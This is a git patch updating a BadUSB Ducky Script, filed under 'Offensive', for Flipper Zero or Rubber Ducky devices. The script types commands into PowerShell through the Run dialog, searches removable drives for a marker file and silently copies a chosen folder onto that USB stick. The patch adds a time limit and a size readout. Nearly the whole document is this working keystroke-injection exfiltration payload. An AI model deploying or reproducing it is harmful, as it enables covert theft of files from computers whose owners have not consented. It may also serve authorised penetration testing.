From b0c225dbeddca9709ccfb420060d45948dd4f471 Mon Sep 17 00:00:00 2001 From: Zarcolio Date: Mon, 17 Jul 2023 16:23:37 +0200 Subject: [PATCH] Update ExfilToUsb.txt --- BadUSB/Ducky Scripts/Offensive/ExfilToUsb.txt | 55 ++++++++++++------- 1 file changed, 34 insertions(+), 21 deletions(-) diff --git a/BadUSB/Ducky Scripts/Offensive/ExfilToUsb.txt b/BadUSB/Ducky Scripts/Offensive/ExfilToUsb.txt index b2f928d..47c5935 100644 --- a/BadUSB/Ducky Scripts/Offensive/ExfilToUsb.txt +++ b/BadUSB/Ducky Scripts/Offensive/ExfilToUsb.txt @@ -17,50 +17,63 @@ REM This script tests all removable drive root directories for a certain file wi REM IF this file is detected, this means this drive is the removable you're using to exfill data to. REM How to use this script? REM Copy this Ducky script to your Flipper Zero or Rubber Ducky, generate a file with a random file name -REM and change the value of $CopyFrom, $CopyTo and $FindMe below accordingly. +REM and change the value of $MaxDuration, $CopyFrom, $CopyTo and $FindMe below accordingly. DELAY 1000 GUI r DELAY 1000 -ALTSTRING powershell +STRING powershell ENTER DELAY 2000 +STRING $MaxDuration = 180 ENTER -ALTSTRING $CopyFrom = "C:\Windows" +ALTCODE $CopyFrom = "C:\Windows" ENTER -ALTSTRING $CopyTo = "copy" +ALTCODE $CopyTo = "copy" ENTER -ALTSTRING $FindMe = "gfhnubkw.txt" +ALTCODE $FindMe = "gfhnubkw.txt" ENTER -ALTSTRING $f = $false +STRING $f = $false ENTER -ALTSTRING Cls +STRING $startTime = Get-Date ENTER -ALTSTRING while (-not $f) { +STRING while ((New-TimeSpan -Start $startTime).TotalSeconds -lt $MaxDuration -and -not $f) { ENTER -ALTSTRING $d = Get-WmiObject -Class Win32_Volume | Where-Object { $_.DriveType -eq 2 } +STRING $d = Get-WmiObject -Class Win32_Volume | Where-Object { $_.DriveType -eq 2 } ENTER -ALTSTRING foreach ($e in $d) { +STRING foreach ($e in $d) { ENTER -ALTSTRING $p = Join-Path -Path $e.Name -ChildPath $FindMe +STRING $p = Join-Path -Path $e.Name -ChildPath $FindMe ENTER -ALTSTRING if (Test-Path $p) { +STRING if (Test-Path $p) { ENTER -ALTSTRING $f = $true +STRING $f = $true ENTER -ALTSTRING Write-Host "Copying..." +STRING $partition = Get-Partition | Where-Object { $_.DriveLetter -eq $e.DriveLetter } ENTER -ALTSTRING $Destination = "$($e.Name)\$CopyTo" +STRING $totalSize = 0 ENTER -ALTSTRING Copy-Item -Path $CopyFrom -Destination $Destination -Recurse -ErrorAction SilentlyContinue ; Exit +STRING $files = Get-ChildItem $CopyFrom -File -Recurse -ErrorAction SilentlyContinue ENTER -ALTSTRING } +STRING foreach ($file in $files) { ENTER -ALTSTRING break +STRING $totalSize += $file.Length} ENTER -ALTSTRING } +STRING if ($totalSize -lt 1GB) { ENTER -ALTSTRING } +ALTCODE $totalSizeFormatted = "$([Math]::Round($totalSize / 1MB, 1)) MB"} ENTER -ALTSTRING Exit +STRING else { +ENTER +ALTCODE $totalSizeFormatted = "$([Math]::Round($totalSize / 1GB, 1)) GB"} +ENTER +ALTCODE Write-Host "Copying... $totalSizeFormatted to $($e.DriveLetter)" +ENTER +ALTCODE $Destination = "$($e.Name)\$CopyTo" +ENTER +STRING Copy-Item -Path $CopyFrom -Destination $Destination -Recurse -ErrorAction SilentlyContinue +ENTER +STRING Exit} +ENTER +STRING break}} ENTER